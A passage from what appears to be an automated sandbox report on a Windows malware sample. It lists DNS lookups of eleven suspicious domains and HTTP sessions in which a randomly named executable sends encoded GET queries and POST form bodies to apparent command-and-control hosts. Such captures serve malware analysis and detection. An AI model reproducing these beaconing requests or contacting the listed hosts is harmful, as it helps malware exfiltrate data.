                                                                        Nov 7, 2024 18:00:08.341720104 CET804987947.52.221.8192.168.2.7
                                                                        Nov 7, 2024 18:00:08.442974091 CET4987980192.168.2.747.52.221.8
                                                                        Nov 7, 2024 18:00:08.537457943 CET804987947.52.221.8192.168.2.7
                                                                        Nov 7, 2024 18:00:08.537518024 CET4987980192.168.2.747.52.221.8
                                                                        Nov 7, 2024 18:00:08.873837948 CET4987980192.168.2.747.52.221.8
                                                                        Nov 7, 2024 18:00:09.894845009 CET4988080192.168.2.747.52.221.8
                                                                        Nov 7, 2024 18:00:09.900196075 CET804988047.52.221.8192.168.2.7
                                                                        Nov 7, 2024 18:00:09.900280952 CET4988080192.168.2.747.52.221.8
                                                                        Nov 7, 2024 18:00:09.915268898 CET4988080192.168.2.747.52.221.8
                                                                        Nov 7, 2024 18:00:09.920092106 CET804988047.52.221.8192.168.2.7
                                                                        Nov 7, 2024 18:00:10.871099949 CET804988047.52.221.8192.168.2.7
                                                                        Nov 7, 2024 18:00:10.935966015 CET4988080192.168.2.747.52.221.8
                                                                        Nov 7, 2024 18:00:11.052711010 CET804988047.52.221.8192.168.2.7
                                                                        Nov 7, 2024 18:00:11.052932978 CET4988080192.168.2.747.52.221.8
                                                                        Nov 7, 2024 18:00:12.513931036 CET4988080192.168.2.747.52.221.8

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 7, 2024 17:57:41.744288921 CET4978753192.168.2.71.1.1.1
                                                                        Nov 7, 2024 17:57:41.768758059 CET53497871.1.1.1192.168.2.7
                                                                        Nov 7, 2024 17:58:00.626985073 CET6529753192.168.2.71.1.1.1
                                                                        Nov 7, 2024 17:58:00.705137968 CET53652971.1.1.1192.168.2.7
                                                                        Nov 7, 2024 17:58:14.502022028 CET6442953192.168.2.71.1.1.1
                                                                        Nov 7, 2024 17:58:14.640466928 CET53644291.1.1.1192.168.2.7
                                                                        Nov 7, 2024 17:58:27.923772097 CET5497353192.168.2.71.1.1.1
                                                                        Nov 7, 2024 17:58:27.993077040 CET53549731.1.1.1192.168.2.7
                                                                        Nov 7, 2024 17:58:41.423681021 CET5674553192.168.2.71.1.1.1
                                                                        Nov 7, 2024 17:58:41.838493109 CET53567451.1.1.1192.168.2.7
                                                                        Nov 7, 2024 17:58:55.408756018 CET6274853192.168.2.71.1.1.1
                                                                        Nov 7, 2024 17:58:55.767465115 CET53627481.1.1.1192.168.2.7
                                                                        Nov 7, 2024 17:59:09.581321955 CET5275053192.168.2.71.1.1.1
                                                                        Nov 7, 2024 17:59:09.628746986 CET53527501.1.1.1192.168.2.7
                                                                        Nov 7, 2024 17:59:25.036891937 CET6484953192.168.2.71.1.1.1
                                                                        Nov 7, 2024 17:59:25.098483086 CET53648491.1.1.1192.168.2.7
                                                                        Nov 7, 2024 17:59:38.690839052 CET5198453192.168.2.71.1.1.1
                                                                        Nov 7, 2024 17:59:38.706545115 CET53519841.1.1.1192.168.2.7
                                                                        Nov 7, 2024 17:59:53.159305096 CET5264353192.168.2.71.1.1.1
                                                                        Nov 7, 2024 17:59:53.194895029 CET53526431.1.1.1192.168.2.7
                                                                        Nov 7, 2024 18:00:06.783601046 CET5927753192.168.2.71.1.1.1
                                                                        Nov 7, 2024 18:00:07.343774080 CET53592771.1.1.1192.168.2.7

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 7, 2024 17:57:41.744288921 CET192.168.2.71.1.1.10x7eaaStandard query (0)www.corpseflowerwatch.orgA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:58:00.626985073 CET192.168.2.71.1.1.10xbd8dStandard query (0)www.4nk.educationA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:58:14.502022028 CET192.168.2.71.1.1.10x4592Standard query (0)www.migraine-massages.proA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:58:27.923772097 CET192.168.2.71.1.1.10x6d4dStandard query (0)www.vnxoso88.artA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:58:41.423681021 CET192.168.2.71.1.1.10x46ecStandard query (0)www.pluribiz.lifeA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:58:55.408756018 CET192.168.2.71.1.1.10x633Standard query (0)www.kdtzhb.topA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:59:09.581321955 CET192.168.2.71.1.1.10x885fStandard query (0)www.evoo.websiteA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:59:25.036891937 CET192.168.2.71.1.1.10xeeb3Standard query (0)www.astorg-group.infoA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:59:38.690839052 CET192.168.2.71.1.1.10xf1acStandard query (0)www.fiqsth.vipA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:59:53.159305096 CET192.168.2.71.1.1.10x2560Standard query (0)www.bio-thymus.comA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 18:00:06.783601046 CET192.168.2.71.1.1.10xc5ffStandard query (0)www.wukong.collegeA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 7, 2024 17:57:41.768758059 CET1.1.1.1192.168.2.70x7eaaNo error (0)www.corpseflowerwatch.orgcorpseflowerwatch.orgCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 7, 2024 17:57:41.768758059 CET1.1.1.1192.168.2.70x7eaaNo error (0)corpseflowerwatch.org3.33.130.190A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:57:41.768758059 CET1.1.1.1192.168.2.70x7eaaNo error (0)corpseflowerwatch.org15.197.148.33A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:58:00.705137968 CET1.1.1.1192.168.2.70xbd8dNo error (0)www.4nk.educationwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 7, 2024 17:58:00.705137968 CET1.1.1.1192.168.2.70xbd8dNo error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:58:14.640466928 CET1.1.1.1192.168.2.70x4592No error (0)www.migraine-massages.pro199.59.243.227A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:58:27.993077040 CET1.1.1.1192.168.2.70x6d4dNo error (0)www.vnxoso88.artvnxoso88.artCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 7, 2024 17:58:27.993077040 CET1.1.1.1192.168.2.70x6d4dNo error (0)vnxoso88.art66.29.146.14A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:58:41.838493109 CET1.1.1.1192.168.2.70x46ecNo error (0)www.pluribiz.life209.74.64.58A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:58:55.767465115 CET1.1.1.1192.168.2.70x633No error (0)www.kdtzhb.top47.242.89.146A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:59:09.628746986 CET1.1.1.1192.168.2.70x885fNo error (0)www.evoo.website128.65.195.180A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:59:25.098483086 CET1.1.1.1192.168.2.70xeeb3No error (0)www.astorg-group.infowebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 7, 2024 17:59:25.098483086 CET1.1.1.1192.168.2.70xeeb3No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:59:38.706545115 CET1.1.1.1192.168.2.70xf1acNo error (0)www.fiqsth.vipfiqsth.vipCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 7, 2024 17:59:38.706545115 CET1.1.1.1192.168.2.70xf1acNo error (0)fiqsth.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:59:38.706545115 CET1.1.1.1192.168.2.70xf1acNo error (0)fiqsth.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:59:53.194895029 CET1.1.1.1192.168.2.70x2560No error (0)www.bio-thymus.combio-thymus.comCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 7, 2024 17:59:53.194895029 CET1.1.1.1192.168.2.70x2560No error (0)bio-thymus.com3.33.130.190A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 17:59:53.194895029 CET1.1.1.1192.168.2.70x2560No error (0)bio-thymus.com15.197.148.33A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 18:00:07.343774080 CET1.1.1.1192.168.2.70xc5ffNo error (0)www.wukong.college47.52.221.8A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • www.corpseflowerwatch.org
                                                                        • www.4nk.education
                                                                        • www.migraine-massages.pro
                                                                        • www.vnxoso88.art
                                                                        • www.pluribiz.life
                                                                        • www.kdtzhb.top
                                                                        • www.evoo.website
                                                                        • www.astorg-group.info
                                                                        • www.fiqsth.vip
                                                                        • www.bio-thymus.com
                                                                        • www.wukong.college

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.7498123.33.130.190803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:57:41.814068079 CET398OUTGET /yjfe/?7j=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZq285UIefAyWvRUTG1EMSSL8yxTXDHgut2ZldiYl/24i9u+qUtajOfEi&UvgPX=o0HdzhbpI6gx HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.corpseflowerwatch.org
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 17:57:45.552470922 CET417INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 16:57:45 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 277
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 6a 3d 73 73 4c 6c 2f 37 30 47 41 68 55 63 4b 64 44 67 64 56 66 58 6f 70 37 66 78 52 4d 67 70 59 69 5a 33 76 73 4a 63 63 4f 55 48 79 43 71 7a 63 70 66 72 49 72 72 64 30 34 61 32 4f 41 4e 36 57 66 48 68 77 79 42 30 52 51 2b 44 6c 6a 6e 48 75 36 52 67 75 70 52 5a 71 32 38 35 55 49 65 66 41 79 57 76 52 55 54 47 31 45 4d 53 53 4c 38 79 78 54 58 44 48 67 75 74 32 5a 6c 64 69 59 6c 2f 32 34 69 39 75 2b 71 55 74 61 6a 4f 66 45 69 26 55 76 67 50 58 3d 6f 30 48 64 7a 68 62 70 49 36 67 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7j=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZq285UIefAyWvRUTG1EMSSL8yxTXDHgut2ZldiYl/24i9u+qUtajOfEi&UvgPX=o0HdzhbpI6gx"}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.749840217.70.184.50803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:00.725179911 CET646OUTPOST /gnvu/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.4nk.education
                                                                        Origin: http://www.4nk.education
                                                                        Referer: http://www.4nk.education/gnvu/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 46 4f 57 49 49 61 53 77 4e 6f 56 42 4e 62 42 77 6a 74 65 42 53 79 44 2b 72 4e 4d 62 36 4b 42 4d 57 62 45 35 2f 79 39 46 4c 55 57 38 46 62 32 38 77 3d 3d
                                                                        Data Ascii: 7j=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTFOWIIaSwNoVBNbBwjteBSyD+rNMb6KBMWbE5/y9FLUW8Fb28w==
                                                                        Nov 7, 2024 17:58:01.520694971 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:58:01 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.749842217.70.184.50803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:03.416752100 CET666OUTPOST /gnvu/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.4nk.education
                                                                        Origin: http://www.4nk.education
                                                                        Referer: http://www.4nk.education/gnvu/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 42 33 4b 38 4e 69 6b 2b 4b 71 34 62 43 4c 48 73 4a 68 6f 39 44 46 6d 43 30 48 47 72 54 5a 71 42 73 4c 41 53 33 64 4f 77 32 59 72 2b 32 37 59 77 6f 47 2f 71 53 4a 53 39 48 55 74 6f 64 6c 53 56 6a 58 51 69 4d 6b 42 43 69 61 35 32 76 2b 46 74 2f 76 39 56 2b 77 6c 63 47 64 2f 68 67 51 32 4d 65 70 36 75 6e 45 79 36 44 37 4c 39 6f 66 4b 2b 2b 43 6d 66 55 67 2b 63 55 71 75 49 65 57 63 32 74 77 65 45 37 61 6a 71 42 68 79 66 44 4b 34 36 70 70 36 4d 63 58 30 4f 58 66 63 30 64 47 63 61 38 78 38 78 58 36 79 71 41 31 50 33 48 6f 30 58 2b 71 49 37 64 65 44 56 59 35 44 5a 2f 6b 3d
                                                                        Data Ascii: 7j=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcB3K8Nik+Kq4bCLHsJho9DFmC0HGrTZqBsLAS3dOw2Yr+27YwoG/qSJS9HUtodlSVjXQiMkBCia52v+Ft/v9V+wlcGd/hgQ2Mep6unEy6D7L9ofK++CmfUg+cUquIeWc2tweE7ajqBhyfDK46pp6McX0OXfc0dGca8x8xX6yqA1P3Ho0X+qI7deDVY5DZ/k=
                                                                        Nov 7, 2024 17:58:04.139786959 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:58:04 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.749843217.70.184.50803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:06.001827955 CET1679OUTPOST /gnvu/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.4nk.education
                                                                        Origin: http://www.4nk.education
                                                                        Referer: http://www.4nk.education/gnvu/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 41 6a 4b 37 2f 61 6b 76 62 71 34 59 43 4c 48 79 5a 68 70 39 44 46 6e 43 79 75 50 72 54 6c 36 42 71 50 41 44 69 42 4f 6e 55 77 72 6e 47 37 59 74 34 47 2b 6b 79 4a 4c 39 48 6b 68 6f 64 31 53 56 6a 58 51 69 4b 41 42 56 6a 61 35 6c 2f 2b 47 71 2f 76 35 45 75 78 77 63 47 30 4b 68 67 63 4d 4d 75 4a 36 72 33 55 79 33 52 44 4c 38 49 66 55 2f 2b 43 2b 66 54 70 35 63 55 32 45 49 65 4c 4a 32 71 63 65 47 4d 72 49 77 77 63 6b 45 56 57 6a 2b 71 5a 38 45 64 6e 62 42 31 76 41 2f 75 36 6d 66 72 68 63 70 6d 4f 71 35 30 38 2b 6f 47 38 31 66 73 53 76 34 4c 58 4b 45 4b 56 39 64 37 71 68 50 54 4c 36 64 59 44 47 4f 6d 6e 70 41 33 47 46 42 4a 31 6a 78 6e 56 61 63 73 4b 74 6d 52 5a 34 70 44 54 35 63 39 6d 6c 58 53 46 57 64 61 6e 4f 2f 48 38 76 79 4c 4c 41 41 4d 46 4a 6d 75 5a 6a 6f 35 44 56 7a 53 39 59 71 34 37 4d 63 30 68 6c 62 6c 31 4e 6e 73 58 36 43 41 4b 47 33 31 68 4b 36 38 39 6d 74 63 55 [TRUNCATED]
                                                                        Data Ascii: 7j=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcAjK7/akvbq4YCLHyZhp9DFnCyuPrTl6BqPADiBOnUwrnG7Yt4G+kyJL9Hkhod1SVjXQiKABVja5l/+Gq/v5EuxwcG0KhgcMMuJ6r3Uy3RDL8IfU/+C+fTp5cU2EIeLJ2qceGMrIwwckEVWj+qZ8EdnbB1vA/u6mfrhcpmOq508+oG81fsSv4LXKEKV9d7qhPTL6dYDGOmnpA3GFBJ1jxnVacsKtmRZ4pDT5c9mlXSFWdanO/H8vyLLAAMFJmuZjo5DVzS9Yq47Mc0hlbl1NnsX6CAKG31hK689mtcUKPAhaNpMQq979kYDODo/EGzn9WzCG6moFyqpqZ+rShHu7FiHmDao6ZRDPixUU6V7iPlXFRMDR0ay4v9lPNRb30zafP+/nzq5WHZcMpvneqp/Wabkv03vZ+DWCZNknwkGV/jIZ6UtSjEhwkea95+ocQkKYpvEMz93dznA04+n04WI0G2ryMf5xF0Q3UbquHWgJyFRVtIvwJC1a8ghE8HYCuBovG+If0uKNkgkxZx5I8vKLWneduFVZos7OY3KjsaP1hQc55+oFU4V0ko5u/CWr2aeE2hdzEcJ5It6z/6OCj7YqpfWrdIez8mi3shUECx+uxlvf6tCTbBb7tYUPBF6rA1jQ3kHEpHL6ryPTeIM2JVh1JBTvxdHKT2XnPXjfKX4VXUkL4aNZADSCrb4rlUR1We38OA9AdpY6VGr9tP/ibYQeOlQnne+nSfFIkmbtc9paMXEIXH04Aea72Xji5AeZI6gKW3R7EgFnr24VqqsxApeA/fYLNDYbQVnfHL0q0eLzjNpOPuiue1WOBd33sD1Kd57SRoU9X5uNnpA3V2bMZG8Zzk/4/y2jCPg9wxYYgAI0SqziLLv4Ei/SBmDZanXeeNFZCwI3FTtKDiepyJrMT634xX6xItYA3Q+NgdjkhvY3xBEynGGfm23+YGBIvnHWSlNeS8rTTqb0W [TRUNCATED]
                                                                        Nov 7, 2024 17:58:06.796307087 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:58:06 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.749844217.70.184.50803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:08.549515009 CET390OUTGET /gnvu/?7j=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FgkX779Cut1JrjhVNutQKYieetaE9VDmnk+XmhNaaOMMHcA19omccG+Ez&UvgPX=o0HdzhbpI6gx HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.4nk.education
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 17:58:09.371634007 CET1236INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:58:09 GMT
                                                                        Content-Type: text/html
